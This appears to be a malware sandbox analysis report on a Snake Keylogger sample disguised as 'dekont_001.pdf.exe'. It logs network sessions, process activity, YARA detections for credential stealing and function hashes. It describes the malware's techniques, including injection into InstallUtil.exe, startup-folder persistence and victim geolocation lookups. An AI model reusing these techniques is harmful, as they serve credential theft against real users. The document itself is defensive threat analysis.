Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49761	188.114.97.3	443	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:29 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 19:27:29 UTC	898	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44125 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EjjSjhUiaE6G9yvhwBza5at4r7dDjyVf%2BpbT7cQMNuIc1%2BPTwid2NYAfnatV6c%2BSe3aQN8R3mZLUpg%2Bt46ivBKa0rgUWB5nfI2GU1%2BeWEXKGhWFWTGUCfTaGvzS8USsoPbn0yq9l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849ab08db845e3-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2666666&cwnd=251&unsent_bytes=0&cid=37b1e28a2162da3e&ts=168&x=0"
2024-10-25 19:27:29 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49763	188.114.97.3	443	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:30 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 19:27:30 UTC	894	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44126 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNbpgDFD%2FP9uwFJxUDkh%2FmCetk8GDTSGJ5%2FSxlyFP4TwxklJdlwpIJqwgfBmy5mq5pgB4ndGmIJBRxkNZnhHpk65AxvGyKwJaQnqg771ORBlpddjJ8QmxgWWPBrGCi62Mea3kNCL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849ab98b2d6c69-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1219&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2258970&cwnd=251&unsent_bytes=0&cid=df83dc2d15feed51&ts=166&x=0"
2024-10-25 19:27:30 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49765	188.114.97.3	443	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:32 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 19:27:32 UTC	896	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44128 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2FPd0aL2R9BzH%2BQyADh01ZrLYBrz6Y4XGK0xhsjnw9r2BqKWO%2F3KCdPqU3qUxksuHh3gBd0cM8pGKm0yl9zc50UR4jetaHkzHKj%2FtPULc2l11dpEkSEJA4B2o4aGvpSYVqcsn8rv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849ac27f09e98b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1467&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2135693&cwnd=243&unsent_bytes=0&cid=649c1bcfefe7a026&ts=165&x=0"
2024-10-25 19:27:32 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49767	188.114.97.3	443	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:33 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 19:27:33 UTC	900	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44129 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHAzIsSHyPilTyPAUfCqn392ZXckA5m%2B%2BztPpjc12kgbgx2wf0%2BHVc%2B%2BR4kM6KnrCdfph474jBUZqrF9QKYFUCoOqe1wG8k5OYb7wQad7g5swBhI0ZVqU7FrdSaZaPkIuVXSMGf9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849acb7b3e6c2b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1095&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2503025&cwnd=227&unsent_bytes=0&cid=39423f34dca6c90c&ts=161&x=0"
2024-10-25 19:27:33 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:26:56
Start date:	25/10/2024
Path:	C:\Users\user\Desktop\dekont_001.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dekont_001.pdf.exe"
Imagebase:	0xb30000
File size:	6'656 bytes
MD5 hash:	E8988AD104148396F3BBC969C3E84A94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1761092855.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1772224991.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:27:04
Start date:	25/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x930000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.2934160902.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.2934160902.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	15:27:15
Start date:	25/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs"
Imagebase:	0x7ff624a30000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:27:16
Start date:	25/10/2024
Path:	C:\Users\user\AppData\Roaming\Id.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Id.exe"
Imagebase:	0xc70000
File size:	6'656 bytes
MD5 hash:	E8988AD104148396F3BBC969C3E84A94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.1927771292.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:27:21
Start date:	25/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xdf0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2933316783.000000000332D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2933316783.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 0118D248 Relevance: 6.0, Strings: 4, Instructions: 983COMMON

Download Yara Rule

Strings

TJcq, xrefs: 0118D3EA
pbq, xrefs: 0118DE02
xbaq, xrefs: 0118D375
Te^q, xrefs: 0118D96B

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$pbq$xbaq
API String ID: 0-1954897716
Opcode ID: 46a4c65ef2249dc787d94872f0fdd38261519c59e3fdb8d0b398917f640dc675
Instruction ID: 432f1e116cca798a071eac10c1aaf86efd1759ab6b69183c7b2ce64bbdd0f8ad
Opcode Fuzzy Hash: 46a4c65ef2249dc787d94872f0fdd38261519c59e3fdb8d0b398917f640dc675
Instruction Fuzzy Hash: C9A2C775A00228CFDB58DF69C984AD9BBB2FF89304F1581E9D509AB365DB319E81CF40

Function 05E83628 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769590501.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: true

Associated: 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e30000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 066524749b4e3f25ee3cd3f8ece7b03b4d3d00186c1415f5e434a85febb9019f
Instruction ID: 995fef3c357fdfeeec69cf888be19164f97b42a0305a4aded266ce2040e9f9d7
Opcode Fuzzy Hash: 066524749b4e3f25ee3cd3f8ece7b03b4d3d00186c1415f5e434a85febb9019f
Instruction Fuzzy Hash: 40D10274A05228CFDB54EF69D884BADBBF2FB89304F1092A9D44DA7398DB345985CF10

Function 0118F060 Relevance: 6.6, Strings: 5, Instructions: 348COMMON

Download Yara Rule

Strings

(bq, xrefs: 0118F3A9
(bq, xrefs: 0118F174
(bq, xrefs: 0118F282
(bq, xrefs: 0118F1CB
(bq, xrefs: 0118F2AE

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID: (bq$(bq$(bq$(bq$(bq
API String ID: 0-2298650571
Opcode ID: d43fc9d126abdbcd385bc96fe139669ec9ab1d4c9a23aefd54f57e00b7cecc22
Instruction ID: b796f6c5aed74b9ba34f192ff26f602f9b23d356894b051051b7f4fefddb2f0a
Opcode Fuzzy Hash: d43fc9d126abdbcd385bc96fe139669ec9ab1d4c9a23aefd54f57e00b7cecc22
Instruction Fuzzy Hash: 78C1F4313042658FD719EF69D850AAE7BA6EF89351B14817AE905CB391CF39DC06CBA0

Function 0118FE50 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

(bq, xrefs: 0118FEE0

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: e711bb9ac9edf99c6a27821f1f450d4e8f01c81af238daf3de38dcdaf52b7637
Instruction ID: 768a3d9381499ccd7bfa18f872078c9896d83b21a0791a033005f3c26aca57f8
Opcode Fuzzy Hash: e711bb9ac9edf99c6a27821f1f450d4e8f01c81af238daf3de38dcdaf52b7637
Instruction Fuzzy Hash: 9C41D2317002519FC718EF6DD85056ABBA6EFDA214728C57EE506CB292CB35DC07CB90

Function 01180B00 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

Te^q, xrefs: 01180B8E

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 8ec68d9bd4803182ba276c8230a58f33e6d703a11c8bb963feb5e5824f7ed69b
Instruction ID: 46580d073d7a01961f97163d746647ada231bc6c98bce50fcda04cc04d2c41c1
Opcode Fuzzy Hash: 8ec68d9bd4803182ba276c8230a58f33e6d703a11c8bb963feb5e5824f7ed69b
Instruction Fuzzy Hash: 45317034A002199FCB18EF79C894A9EBBF2BF88714F108469E405AB3A4DF749C05CF91

Function 01180858 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

Te^q, xrefs: 0118087C

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: ba5a96ef240b772275d2dd2dcd4f3d2f7a96f2b7c58a9f2c16ecea763fd7dabd
Instruction ID: 060a28e9638ce55a7ce2e9894ec563d09a0179a4d9da2a389c35299df0918039
Opcode Fuzzy Hash: ba5a96ef240b772275d2dd2dcd4f3d2f7a96f2b7c58a9f2c16ecea763fd7dabd
Instruction Fuzzy Hash: 05119D34E001198BDB18EB69C859BDE7BF1BB4C704F148068E505AB394EB34A945CFA1

Function 01180868 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

Te^q, xrefs: 0118087C

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: d61cc6e459beb5c22c6b37c5d452415a056060f51ffb8b1b305e8b39a95d8ea5
Instruction ID: ad79764ec0c70731640e4db7bdfa8fa1dc8afea4a0765e1f761ed982547feb20
Opcode Fuzzy Hash: d61cc6e459beb5c22c6b37c5d452415a056060f51ffb8b1b305e8b39a95d8ea5
Instruction Fuzzy Hash: 5C115E34E001198BDB18EB69C4597DE7BB1AB4C704F108429E505BB394DB749945CFA1

Function 075B707F Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

8, xrefs: 075B70D8

Memory Dump Source

Source File: 00000000.00000002.1772774307.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_dekont_001.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 164cc5ab916353310de210fbbc8c36d2beb2774cf841db786081d8d1c541a433
Instruction ID: 327ba19d600b320af47e8d0d259dcfc609300c14344f396ff2a31741f5a76230
Opcode Fuzzy Hash: 164cc5ab916353310de210fbbc8c36d2beb2774cf841db786081d8d1c541a433
Instruction Fuzzy Hash: 8601507081616ACFEB699F28CC087AABBB1FF89305F4004E9D108A7281DB391D84CF51

Function 05E82C38 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769590501.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: true

Associated: 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e30000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 470e01c4727a50dcf492ccd9aef35f5f8c6aa6ba6ed77ba4ae206a14d9c35fe1
Instruction ID: 1a4a875e268e65e587734742d8b2cbf26066b9d4459c305dc9097ff39aaa5ff1
Opcode Fuzzy Hash: 470e01c4727a50dcf492ccd9aef35f5f8c6aa6ba6ed77ba4ae206a14d9c35fe1
Instruction Fuzzy Hash: 51E12878A04228CFDB54EFA9D844BADBBB2FB89300F1091A9D54EA7354DB345D86CF50

Function 0118F530 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1760408406.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1180000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb20c13132ad71501f6585091294758740548dce863e033f999cb79635fc3dda
Instruction ID: 7e27f209f83cee0743d61633ae5cc7407392fe481aa48474e576049aed01a9e4
Opcode Fuzzy Hash: eb20c13132ad71501f6585091294758740548dce863e033f999cb79635fc3dda
Instruction Fuzzy Hash: 9881F735A005198FDB19EF68C58499DBBF6EF48350B258169E906DB371DB30ED42CF90

Function 05E818A8 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769590501.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: true

